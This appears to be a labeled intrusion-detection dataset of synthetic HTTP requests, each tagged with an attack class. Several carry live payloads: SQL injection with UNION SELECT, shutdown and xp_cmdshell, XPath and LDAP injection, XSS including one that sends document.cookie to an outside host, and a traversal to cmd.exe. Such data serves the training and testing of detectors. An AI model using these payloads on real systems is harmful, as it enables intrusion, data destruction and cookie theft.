TE: trailers,deflate,gzip
Trailer: Pragma
User-Agent: tnt1mo1
UA-CPU: x86
UA-Disp: 5653,4264,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5717x165
Via: 0.6 www.0p2c.js:9182, 6.5 www.E3t5ris.jpg, emlc/4.4 www.egey.css
Transfer-Encoding: ncqru; klDi=mthma
Upgrade: nraObn/3.7
Warning: 306 www.lawl.shtml "aurdPlier1ephtrtem2m" "Sun, 15 Feb 04 16:47:27 UTC"
X-Forwarded-For: 122.93.208.190
X-Serial-Number: 42053074878
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44802
Start - Id: 49614
class: XPathInjection
GET /in2Iu3VjBUy2gNBmhYTC/e2oVrrtamte3/eeinhzllon39amk/ndflteerenbraEir/6wgetkvJ1likeGUF/qaXX.php4?S4id31FQ=LtsgxApeanea&ptdc1=1590++++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+44928%3D HTTP/1.0
Host: 132.52.29.11
Connection: close
Accept: text/*, text/xml, video/*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 124.225.114.247
Cookie: yes=haincludedas;yttmiit=28133446;EnnfeS=dehAhym44si
Cookie2: $Version="392"
Date: Tue, 06 Jun 06 06:22:33 CET
ETag: W/"baj@.7Mq2NB-WyuTN"
Expect: 100-continue
From: rrm2hTst@reeb.net
If-Modified-Since: Fri, 09 May 08 08:35:37 GMT
If-Unmodified-Since: Fri, 11 Jul 08 03:41:48 CET
If-Match: "g4WpZKbe1bO39csVcth"
If-None-Match: *
If-Range: Tue, 05 Oct 04 05:56:11 UTC
Max-Forwards: 5
MIME-Version: 5.6
Pragma: a6=tt
Proxy-Authorization: NTLM bGN0bmlwc25pbjdicmlkNW10ekFjZXRuYWxhdWVpZWVo
Authorization: Digest cnonce="UloshU"
Range: 7852-
Referer: http://www.yidm.be/1plsoc/1n8ne/yedewe/mraRx.jsp
TE: deflate;q=0.4
Trailer: Accept-Charset
User-Agent: nPcz1azO3_ http://www.cl3rhn.st
UA-CPU: Sparc
UA-Disp: 1997,806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: 3.2 www.hn8Iz1.html, sdn5rt/7.0 184.180.55.30, 4.9 150.33.156.15:05158
Transfer-Encoding: identity
Upgrade: add/2.5
Warning: 885 www.nan6nedo.jpeg "UhOln0iubuetrq" 
X-Forwarded-For: 94.116.73.204
X-Serial-Number: 9696710
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49614
Start - Id: 41369
class: SqlInjection
POST /5Y1jsR0r@pi715@x-sN/eeazaaeEh0Eyean/iZkOJIh4kHR3h/aibva1FrDBvI5ga-EfW/epUjHzgBp@q/risSimfhhE2hietu.shtml? HTTP/1.0
Content-Length: 181
Content-Language: 6tEaGre4,nn
Content-Encoding: compress
Content-Location: http://www.ddcie7h.it/ayejI8/braigote/pUnda/eo06e/mU0wsnir.js
Content-MD5: dGlpZGFldDZ0eWhpMGVpYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Sep 04 19:42:30 UTC
Last-Modified: Fri, 21 Sep 07 14:51:38 CET
Host: www.7yrhxt.gov
Connection: 6eetiw
Accept: */*;q=0.2
Accept-Charset: windows-874, koi8-r, utf-8;q=0.3
Accept-Encoding: gzip, compress;q=0.7, compress
Accept-Language: psot2-sreMa, mxl-aezes, ytoar-HwgshEcx;q=0.7, 3nE1-nm6Ee, lep3uahi-ssouab
Cache-Control: only-if-cached
Client-ip: 200.4.215.226
Cookie: d0varF6SFBDH='uw~ eo4u\tmadcm\i;eseoa=dKYcjSUK
Cookie2: $Version="234"
Date: Sat, 14 Jan 06 14:52:35 CET
ETag: "ZZiZLREEUVASn-Gfemy7"
Expect: 100-continue
From: wvycy@8isLoesg.de
If-Modified-Since: Sun, 08 Mar 09 20:01:51 UTC
If-Unmodified-Since: Sat, 28 Mar 09 13:40:00 CET
If-Match: "XOCmiS@TrfXEQKC8@p"
If-None-Match: *
If-Range: Wed, 24 Jun 09 16:08:24 GMT
Max-Forwards: 22
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM dG9ub1NydW50OUF5YWJudHluc3RhQnphaHB1d2l6dmFkaTRGdmlobnM=
Authorization: NTLM aE51VGVwdjBlY3JzZUFwNWNub2hvZW9hYUFhZXNreWhjYVd0cm01
Range: 830308-6,-133
Referer: /mjybrsnd/tefRhe/pcEb4t4/Tyqsye/Mfif.jsp
TE: deflate,trailers,chunked
Trailer: Accept-Language
User-Agent: Mozilla/8.1 (Machintosh; U; Mac OS X 8.4; 3o-ua; rv:5.6.8) Gecko/58946993
UA-Disp: 320,3937,32
UA-OS: Windows 98
UA-Color: color32
Via: HTTP/5.9 172.53.5.70:134
Transfer-Encoding: identity
Upgrade: nhetgd/3.9
Warning: 930 168.40.198.240 "aetrpi0rwwtHsS" 
X-Serial-Number: 102930294622
----: ------------------------------------

passwdV-Ek=2peSna&0f2tbaeDodeN=snn o=&iioboPa=eoiaEntht&Eemeuth=af&siafnso2ve=teXBIYd4&Tn0io4rsc='    UNION         ALL        SELECT  rp0s  FROM  dttm    WHERE   '' = '

End - Id: 41369
Start - Id: 35354
class: SqlInjection
GET /jh8v/etaqUnertrsej/hilglt8EsrerRts/n_l5nEbnMuvgOog4fn8r/oina4unbasSiah.mspx?r1stnafoeWuti=n2ap.zPr&Dcgj9K6=iirdsl6pHAa&gstLyT=uowhy8eowm45jt%3E2&tox3fo=lcz5&ee5dtorIA5sii=scu+&arfssHr=m+execpirsofais9&yeefhsess=ot&8TAZcCA7mYo9=ebEAmzXXhe&pt=l+nlgxr&rax=OR++++0314%3E1663870396&YGXfRqisamhinput-=Ialitmp&eItoeiai6=77396&9frEhmw4=fs&eTsnnl3Ny=-ts%3FeTxp_%2Fpasswd%2B HTTP/1.0
Host: 83.145.46.63
Connection: close
Accept: audio/*, image/jpeg
Accept-Charset: iso-8859-9, x-mac-japanese;q=0.1, euc-jp;q=0.2, windows-1254, x-mac-chinesetrad;q=0.8
Accept-Encoding: gzip;q=0.8, deflate, compress;q=0.1, compress;q=0.0, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 85.208.223.94
Cookie: 0huZ9ekti=4536879550
Cookie2: $Version="194"
Date: Wed, 18 Nov 09 05:54:44 GMT
ETag: W/"_UGz7wT0hbLk_psH8NC"
Expect: 100-continue
From: s1wji5ah@eWWEiNhsrw.de
If-Modified-Since: Wed, 07 Apr 10 14:59:26 CET
If-Unmodified-Since: Fri, 20 Feb 09 23:21:24 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 07
MIME-Version: 6.8
Pragma: sc='erAue'
Proxy-Authorization: NTLM YWVlc2VycmFlY2VvOHRiTnQyemdhc3NlbmMyZW90bWFhbnI=
Authorization: hoszw 8terEet=a94t
Range: 1609-18413
Referer: /dmnbmtd/yoreoZ.jpeg
TE: trailers,chunked;q=0.5
Trailer: Max-Forwards
User-Agent: tfhioiebin/8.1
UA-CPU: 68000
UA-Disp: 3189,7325,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 739x825
Via: srz/6.5 218.40.5.106:2835
Transfer-Encoding: evtn; rnnyn5=5ugf3o
Upgrade: gerh/9.6
Warning: 607 30.81.200.157 "5nsed27OeHeodumid" "Wed, 10 Oct 07 05:59:44 GMT"
X-Forwarded-For: 70.158.64.159
X-Serial-Number: 06713
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35354
Start - Id: 47636
class: XSS
GET /i5lt3w/lnpuJYP6eMzCo4F4/yzX.0bfZg5L/Lv/YlXB%udlibWL/orwti.exe?H7S8=ho&utoTeyt=411926&eIsntti=%3Deqh&stI=%26%3Cscript+++%3E%5Balert++%28%275ptjh%27%29%3B%5D%3C%2Fscript++%3E&ilr=nZuSxk&otncmph=osnenDde&tEenaokT=thooSi HTTP/1.1
Host: www.6Rdohdh.gov
Connection: close
Accept: */*;q=0.1
Accept-Charset: hz-gb-2312;q=0.3, macintosh, iso-8859-15;q=0.6, windows-1252;q=0.4, iso-8859-4;q=0.0
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: max-stale=8
Client-ip: 113.72.70.216
Cookie: HBQWyIBJQ=4724736;ws=u5w5xqW4X;H_httpsSncg.z=6QrXb;oeHitrinooo=ncu9Iuodo;dniEp7khdeyir=lNSG8f_;gcRnyeiq0oreega=hazwtdt1xiu
Cookie2: $Version="84"
Date: Sat, 29 Jan 05 23:00:52 CET
ETag: "TdniaquDYa_.JvfuX"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Sat, 08 Nov 08 13:16:02 UTC
If-Unmodified-Since: Wed, 15 Sep 04 22:00:31 GMT
If-Match: "d@3B2bDMxTc8hErsl7W"
If-None-Match: "I3xRtDw2TfTz.cC"
If-Range: Fri, 05 Jan 07 06:32:39 GMT
Max-Forwards: 7
MIME-Version: 4.1
Pragma: utehre='sijnllLN'
Proxy-Authorization: NTLM cmF0YUUybGlvcmNSTGNjZDk2ZWhhcWpldG85bzFhZWV0YWttdGxvcg==
Authorization: Basic ZTV0V2ZudGI6YmFoeXBkdHQ=
Range: 51-,059585-
Referer: /pqtjr/rn6H/VNpzE/aeeeia/tx3ip.mspx
TE: trailers,deflate;q=0.3,trailers
Trailer: Warning
User-Agent: Mozilla/8.0 (Machintosh; U; PPC 4.1; n0-Ms; rv:6.5.2) Gecko/22463065
UA-CPU: StrongARM
UA-Disp: 434,760,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3658x8516
Via: HTTP/1.6 22.150.222.205, HTTP/4.1 189.138.195.88:672
Transfer-Encoding: identity
Upgrade: xibuaa/6.4
Warning: 544 147.190.206.64 "e6Olrstooilettn" 
X-Forwarded-For: 111.147.190.89
X-Serial-Number: 6943669939
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47636
Start - Id: 41981
class: SqlInjection
GET /irtiilabqtbooabj/rZqFR_hWz@vg/awxPhs6gHq/1lKpdFq/paiihiii/adleapntu6strtArt8/wheredocumenti0optmnwhereHiLKL/xhonhol8ua87/tPQ0ORUcHjxa/tarwrrHthceFeqsMft/bhp7h2i/5gmRlasgbS.jpg?anoGjeicqd=948127&hiulsuolbr2r5xi=2930&tfoetEbttlN=aheoth6cghaving&@1fQn=%27%3B+shutdown--&r1t=re%28autoexecOvnp+m&qglprt=080&mhfe6qb7=likec&i1ndoedre7=408151&aolbtgpt=obe+u3e HTTP/1.0
Host: 32.16.37.141
Connection: fhnee
Accept: image/jpeg;q=0.4, image/jpeg, application/x-tar
Accept-Charset: windows-1250, x-mac-arabic;q=0.1, iso-8859-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 41.133.176.17
Cookie: nisd8enca=pcrl;yth3hn1maee=vre
Cookie2: $Version="316"
Date: Sat, 24 Apr 04 10:47:49 GMT
ETag: "H-wtGNRWTakDfVw7"
Expect: taus=aiyn
From: Iyirabt@mar7tEeeb7.de
If-Modified-Since: Mon, 24 Nov 08 05:30:00 GMT
If-Unmodified-Since: Tue, 13 Jan 04 06:18:48 GMT
If-Match: *
If-None-Match: "vwge@FysRj3zYHz"
If-Range: Sat, 25 Sep 04 13:40:58 GMT
Max-Forwards: 389
MIME-Version: 0.8
Pragma: otniwcif='n7l'
Proxy-Authorization: Digest uri=http://Ih9gc.net/soss.txt
Authorization: Basic ZWE0aHo6cm44ZmllMXY=
Range: -221064
Referer: /4tocr/edtsaee/pr33qex/lnh7mo3.tar
TE: gzip,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/1.3 (X11; U; Unix 2.6; lo-4e; rv:2.5.1) Gecko/81235409
UA-CPU: Sparc
UA-Disp: 4298,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8709x899
Via: 6ucKLt/1.7 www.betno.jpeg, FTP/6.9 219.111.145.75
Transfer-Encoding: gzip
Upgrade: tsem/9.8, icrMn/2.4
Warning: 119 141.109.167.27 "sebrw" 
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 772384141
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41981
Start - Id: 41119
class: SqlInjection
GET /tgaIZg1PI/eWz9K5mDMdXX1-429/VXWFS/.HW/faigoiz3we7/w@/tilvspinadi.dll?emt8=a4os+arcpsei5o%28fArphpta&osnhaChersrlk=%27%3BEXEC+++master.dbo.xp_cmdshell+++++%27cmd.exe&eonl5aoaWo=gThre HTTP/1.0
Host: 15.146.164.182:80
Connection: keep-alive
Accept: image/*;q=0.0, application/zip;q=0.5
Accept-Charset: *
Accept-Encoding: identity, compress, compress;q=0.1, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 81.217.198.81
Cookie: Ionnla=no fE@ul;euparnEemin82s=r rorzuten;de2saoiemn1t=5Mad7thotT
Cookie2: $Version="75"
Date: Sat, 14 Nov 09 11:17:49 GMT
ETag: "PAECi0n2Z39IoFxobYju"
Expect: a3snhd
From: ljbnc@t4tt.net
If-Modified-Since: Fri, 11 Aug 06 23:35:37 CET
If-Unmodified-Since: Thu, 25 Mar 04 07:15:55 CET
If-Match: "9l9mfS.VXKTUatMYNbeB"
If-None-Match: *
If-Range: Sun, 29 Oct 06 17:36:48 UTC
Max-Forwards: 50
MIME-Version: 3.1
Pragma: Esi=nft
Proxy-Authorization: Digest opaque="sqsll"
Authorization: afQeo onatz=xain
Range: -397
Referer: /orrE/oleial/shyaw.php3
TE: gzip
Trailer: Authorization
User-Agent: stx1mettOn/1.3
UA-CPU: StrongARM
UA-Disp: 071,802,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5422x020
Via: 2.0 www.iitibn.js, HTTP/5.4 www.ioNe.gif, FTP/0.1 104.97.170.90:59
Transfer-Encoding: compress
Upgrade: mdt/1.4, asjofr/9.3, 9meo/3.8
Warning: 323 www.l1Er.tiff "djhflegmslO" "Thu, 15 Apr 04 02:45:31 UTC"
X-Forwarded-For: 247.25.143.27
X-Serial-Number: 54708069609443708
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41119
Start - Id: 37068
class: LdapInjection
GET /mte9jna/2K0Z22gYrHCJHTrgp.i.shtml?tuce=o5T2zaV&ade7pdtontu=%29+%28++++%7C%28Rria%3D9lcse*%29&nesrdeoh7pt7s=iAsPst HTTP/1.1
Host: 69.103.53.209
Connection: keep-alive
Accept: image/jpeg, text/*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.7
Accept-Language: r-irs, nenrwth-3coildr;q=0.7, H-Ot, Msa-l;q=0.6, jti-oepe8ne;q=0.9
Cache-Control: sEnHP9iU='tgsh'
Client-ip: 206.144.26.20
Cookie: leesi4i3=3
Cookie2: $Version="7"
Date: Tue, 18 Jan 05 05:53:52 UTC
ETag: W/"Kzo6hXv1PcdAEDWXUlNO"
Expect: semcn
From: umuI@4eritQe.de
If-Modified-Since: Wed, 12 Aug 09 08:55:48 CET
If-Unmodified-Since: Tue, 31 Aug 04 12:17:46 CET
If-Match: "NtR6OBlSY3vmVyV"
If-None-Match: "iH6GTZsjCvihiJ.7"
If-Range: Fri, 06 Aug 04 05:24:49 GMT
Max-Forwards: 18
MIME-Version: 4.7
Pragma: mnseght=qrs0
Proxy-Authorization: pbvh geI1d=2fi3a
Authorization: NTLM WTZxb2V6c2ltMHNlaU9hdFQ3TXJzbnR0MGx6QWZnbGZ1a21FdA==
Range: -61152
Referer: http://www.co3E.ch/oe8Ndlag/Epc8ii/9sobigi/sesp.jsp
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/4.5 (Windows; U; Win 9x 0.4; tz-eo; rv:4.0.1) Gecko/51547456
UA-CPU: PowerPC
UA-Disp: 584,229,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1905x9959
Via: uaocm/0.7 www.3aece.jpeg, 2.2 194.247.72.38
Transfer-Encoding: compress
Upgrade: ESst/3.1
Warning: 047 34.25.200.147 "rrtrnbieiteop" "Sun, 03 Feb 08 04:41:40 UTC"
X-Forwarded-For: 75.212.179.183
X-Serial-Number: 84105
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37068
Start - Id: 37789
class: LdapInjection
GET /vc0sUjm/oPwzViYvF@o_h-nbYSu/nj/tG@h6Y83HB94L/NE7DzfHO/GadE.html?ffd79ureoS=7028995&XJVHTupdateT=3a3dti%28hs&1rw=drd1tadan&fiherrnnTh=eeny&e5snSiaTlaaR=ratod%29%28++++%7C++%28nah%3D*%29&t9Bwbnnayl=pihhFpnJNetsb0s&f6muIX73_j=amailn&jstyleAKbIdrop=37161&2anowtea=s3c&rietbjn5lom=gebhw&Nhxit=4neuawqzercs&wdFtdcc1ltturpD=po%258exec HTTP/1.0
Host: 113.73.27.197
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: identity;q=0.5
Accept-Language: bui6leqh-amg
Cache-Control: no-store
Client-ip: 3.185.76.253
Cookie: N8uL2IFimgqE=10dtCJ0F;oGgIHo20i=81706028
Cookie2: $Version="4"
Date: Fri, 02 Sep 05 04:51:22 GMT
ETag: W/"hT5JfGxU2GgtrH_ku4"
Expect: 100-continue
From: 0toi@nMoY9ioe.ch
If-Modified-Since: Fri, 17 Jun 05 10:18:07 UTC
If-Unmodified-Since: Mon, 28 Jul 08 08:54:41 GMT
If-Match: "9TTRvX2EtTjfIooZmMa"
If-None-Match: "xP.2rvy@Kyq-1nFiQacF"
If-Range: *
Max-Forwards: 967
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: 5rOgw olket=bU2elthe
Authorization: NTLM Z3Jkb2VpblJvZW9ldWh0aVRubnpuMWVtMWJpd3hudHNoZ211MGFlYQ==
Range: 985797-045,63371-
Referer: http://www.ttRdn.org/welunms/ozmui4.jpeg
TE: trailers
Trailer: If-Match
User-Agent: st0ieorrye
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 807x162
Via: uUTh/8.7 www.aEeOC.gif
Transfer-Encoding: identity
Upgrade: 1wi/0.9, ue5/8.1, uoi/7.4
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 0381591746319527137
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37789
Start - Id: 47114
class: XSS
GET /o.e4l/d69na3ao/iadlCtteele9/twonAn9satetWutfttI/tV/oIti/ieyns6ai/2MiRALFH/pigncp/n_KQ9ZR5354kvX/Ttjhuomeeothntbee.php3?w5gnb=Ndmpwgae&g0dEdveljeATl=s+o&be97nnjroa=%3Cscript++%3Ealert++++%28%27v0ya.yy0w%27%29%3C%2Fscript%3E&lRl9iniei=641&1grsH8N=rlmRnsyonpssscl&twQOGMr=8&nrtaitssmhw=zpi0f HTTP/1.0
Host: 147.222.86.74
Connection: bta4t47
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 11.185.19.209
Cookie: kenloa=Ssietoiihbmifidmu
Cookie2: $Version="3"
Date: Fri, 23 Jan 04 14:13:03 CET
ETag: "vnU_@_vYPqXRe-uJcMr"
Expect: eeOu
From: Srtniim@ss0iltolEd.ch
If-Modified-Since: Fri, 07 Jul 06 06:14:28 CET
If-Unmodified-Since: Tue, 03 Feb 09 02:18:18 UTC
If-Match: "b8Rs.3rm-fsvzwF"
If-None-Match: "98zpJGWpeo_q@nFI"
If-Range: *
Max-Forwards: 2
MIME-Version: 7.3
Pragma: 8=B
Proxy-Authorization: Basic aEFkYXNYOnF1ZXVE
Authorization: NTLM cnNzZ2Vhc3RxbnNlN3JwVWZ2YTl3bm50dHNjY3BzZXJud2U1MHh0bQ==
Range: 38-13,-4
Referer: /4eeree/l7Naiow.cgi
TE: gzip,deflate,trailers
Trailer: If-Range
User-Agent: iehc/4.6
UA-CPU: StrongARM
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7372x166
Via: HTTP/0.9 146.105.44.113:2791
Transfer-Encoding: identity
Upgrade: pen/9.1, ccf/6.5
Warning: 086 126.99.38.140:0 "cofaxltfcL1" "Mon, 16 Jan 06 15:09:10 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 2379709487507553302
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47114
Start - Id: 47437
class: XSS
GET /HzfZV/Odrop1RpThavingzRQw4havingE.dll?anouhei70m1oo=%40&eegtwr=%3Cdiv++++style++%3D++++%22+behaviour%3A+++++url%28%5Bhttp%3A%2F%2Fwww.nd.com%2Fscript%2Fdin.php3%5D%29%3B++++%22++++%3E&wist=ohhaVtn&eisuNfEO=0320180 HTTP/1.0
Host: 51.49.191.50
Connection: close
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.8, windows-1251;q=0.0, x-mac-arabic;q=0.8, x-mac-arabic
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 184.190.224.215
Cookie: NoAaauraecjS=5home;nang=849;tandDoa=cFaa;6Qtwgrenvr4rlyt=qd iionreaesbgsoundtiglrlocation;toozsaao=8414179
Cookie2: $Version="05"
Date: Mon, 19 Jan 09 18:25:17 GMT
ETag: W/"USbOQLZFotY12CP"
Expect: 100-continue
From: desfe5rt@owenslwi5e.org
If-Modified-Since: Sat, 07 Apr 07 17:33:18 GMT
If-Unmodified-Since: Wed, 27 Oct 04 12:08:11 UTC
If-Match: "9jzprbSDNk.N8Qm"
If-None-Match: *
If-Range: Fri, 19 Jun 09 18:29:02 UTC
Max-Forwards: 88
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest nonce
Range: 13744-31405
Referer: /oxgtehu.rar
TE: chunked
Trailer: If-Range
User-Agent: d0vP_q http://www.LIESee4u.net
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 644x740
Via: 3.6 www.5orevyr.png:07, 4.9 www.urHyuh.htm, 5.6 117.197.231.210
Transfer-Encoding: neR6
Upgrade: ipodo/1.3, Abos/3.0, rwucs/0.4, xtsw4a/6.8
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 168.182.251.139
X-Serial-Number: 79894871032971877602
----: ----------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 47437
Start - Id: 45142
class: PathTransversal
GET /./? HTTP/1.0
Host: www.rlm0l.com
Connection: keep-alive
Accept: text/*;q=0.7, text/*
Accept-Charset: iso-8859-1, iso-2022-kr;q=0.2, x-mac-korean
Accept-Encoding: *;q=0.3
Accept-Language: 7e-uca2nm;q=0.2, 1immnudi-wr8ceuoo;q=0.1, e81ttz-h8pn;q=0.4, n5eo-vnx5;q=0.5, 4t-mHIoHs;q=0.4
Cache-Control: aen='sqinh'
Client-ip: 231.243.192.196
Cookie: f6na1hsEsC=0411822;gid3rli5=wo
Cookie2: $Version="89"
Date: Sat, 23 Dec 06 07:05:37 CET
ETag: "0wSFCQ37o04lOpEZWe"
Expect: xoGe=itg9
From: swItt@yOenslihWe.de
If-Modified-Since: Thu, 09 Mar 06 06:29:40 CET
If-Unmodified-Since: Fri, 18 Jul 08 15:09:24 CET
If-None-Match: *
If-Range: "0gcNNxmEKdNOKPe"
Max-Forwards: 3605
Proxy-Authorization: Basic aHRheTpyaWlo
Authorization: rAoes raB3e=rmZse
Referer: http://e3hoTSao.be/e5qae/trebt7ts/0tieeyn/daye/ewpy.wav
User-Agent: Mozilla/1.6 (compatible; MSIE 4.6; Unix; rgnuzgy)
Via: FTP/7.5 92.61.230.33
Upgrade: rihnni/3.3, qrt5E/4.2, tei5h/7.5, aev/2.9
X-Forwarded-For: 189.98.19.155
----: ----------------------------

null

End - Id: 45142
Start - Id: 47784
class: XSS
GET /tTnRtnaehhoiresdle/iB-httpNaUKls4Y@G/DpxD/niwjv77-2aHM005/ypxm/Le7t/onl8KwtWsgg/i_B9vaDe9kHtq/qw9/vZbRne/dDe2a.yBASEQ/dRoH.jpg?.2Ow3ydeletelinkBE=av5%40x&at=spr%25hh%27Oss&ueuk=shileegpsh&aSn8hhrp1eq0=bscript5t&3mtmsS=%3Cbody+++++onload+++%3D+%22++++%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.ol.com%2Fcgi-bin%2Fnttaan.cgi%27%2Bdocument.cookie%29%3B%5D+++%22++%3E&asidksamrpt=%29oaps%3D&20hofnetadeIodn=036026 HTTP/1.1
Host: 179.169.106.201
Connection: close
Accept: */*;q=0.3
Accept-Charset: utf-7, windows-1258, isiri-3342, windows-1257;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 226.38.61.226
Cookie: egn1hliaee=uyivht9ahiIia4;iGmHo=snDbnrdm
Cookie2: $Version="908"
Date: Fri, 10 Jun 05 02:24:53 CET
ETag: W/"24PXDJcX3yUAeSMko"
Expect: tese=ojdN1;xeEsf
From: wh0w4@Ifo8w.st
If-Modified-Since: Sun, 11 Jan 04 10:47:39 UTC
If-Unmodified-Since: Wed, 02 Sep 09 10:42:19 CET
If-Match: ".n_IwtoIzSGxgY7"
If-None-Match: "58MJ1jIeIYKqDDZ5pe9"
If-Range: Fri, 09 May 08 03:24:48 GMT
Max-Forwards: 25
MIME-Version: 8.5
Pragma: itl9loht=bubk
Proxy-Authorization: NTLM cmFDc25ub2lJdW5vaGZvaXRpb3V3cmRkbmRnOGxXYVNvY2VtZWYz
Authorization: Basic dGlZaTZSejpldG80aG5w
Range: 9830-
Referer: /tjs8eY9t/reT7/vheoi.html
TE: chunked;q=0.0,deflate;q=0.1,trailers
Trailer: Accept-Language
User-Agent: rhlaiqestayEosbr7
UA-CPU: PowerPC
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7737x1025
Via: 0.0 www.nmgez.gif:89, 2.4 www.oech.gif, 7.5 72.89.150.186:778
Transfer-Encoding: onrchn; lsJnsa=0uy1oih
Upgrade: zbercb/3.5, lhe1/8.6, HsR/8.3, ne6enE/3.6
Warning: 264 239.66.183.33 "kes2a" 
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47784
Start - Id: 44458
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 240.238.190.171:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: utf-8;q=0.2, isiri-3342
Accept-Encoding: 
Accept-Language: *
Cache-Control: r=n25l
Client-ip: 1.111.16.222
Cookie: saaNuo=4\e;tesboblORmpsldo=92887;tpie=thAl;tTrsmnyal=diae5bttEitmP~;Iesoeae2ngfalth=r7
Cookie2: $Version="0"
Date: Thu, 08 Apr 10 12:50:01 UTC
ETag: "ThoS9sljlpyhPMguDr"
Expect: 100-continue
From: bniw@mamjmaT.net
If-Modified-Since: Wed, 19 Aug 09 21:49:32 UTC
If-Unmodified-Since: Tue, 18 Mar 08 14:46:23 GMT
If-Match: ".7wk_ABn1mKSYzp"
If-None-Match: *
If-Range: *
Max-Forwards: 50
MIME-Version: 3.4
Pragma: trzin='etkp4ct'
Proxy-Authorization: Basic TzJicGU6ZXVndHJa
Authorization: Digest opaque="e2ld"
Range: 6-02287,72753-
Referer: http://www.Yeio9.uk/asa8enf/su5g9pps/ets1ysi.rar
TE: gzip
Trailer: Expect
User-Agent: thittlo (8ef@8cqc; gse0PHq41; mjFZrZFi; n1dk0K)
UA-CPU: Sparc
UA-Disp: 6571,8343,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: 8.9 www.ri2rtnT.htm
Transfer-Encoding: deflate
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 315 155.65.62.19 "entgnaeqidlakodma" 
X-Forwarded-For: 107.82.88.187
X-Serial-Number: 022178
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44458
Start - Id: 41574
class: SqlInjection
GET /osut4o0sdl/01K/tsrtE8lhitdns/hQoR7NOeV7.php4?.deleteBimgDosf=28590504&xSKP=tRZI-I.v-X4&etiere=n0ca+&tibouzif7si=o&urtceaipdytfT=6UxKlnxXSbv&binwMbAbI9system=2075316&KpsL_wZO=%27++++%2F**%2F+++OR++++%2F**%2F+%27T50st%27++%3E+%27S&ihwfge=922676&eKNjoT7b=30&6ftpFausr3EZ5=50091192&S6vesnldceex=link7zs&md=+aohn HTTP/1.0
Host: www.doithtaje.org
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: y-ezaijemo, Yzait-hpn;q=0.1, adlvtE-uteyhsso, q-o7, xONlfjn6-nltoo
Cache-Control: no-store
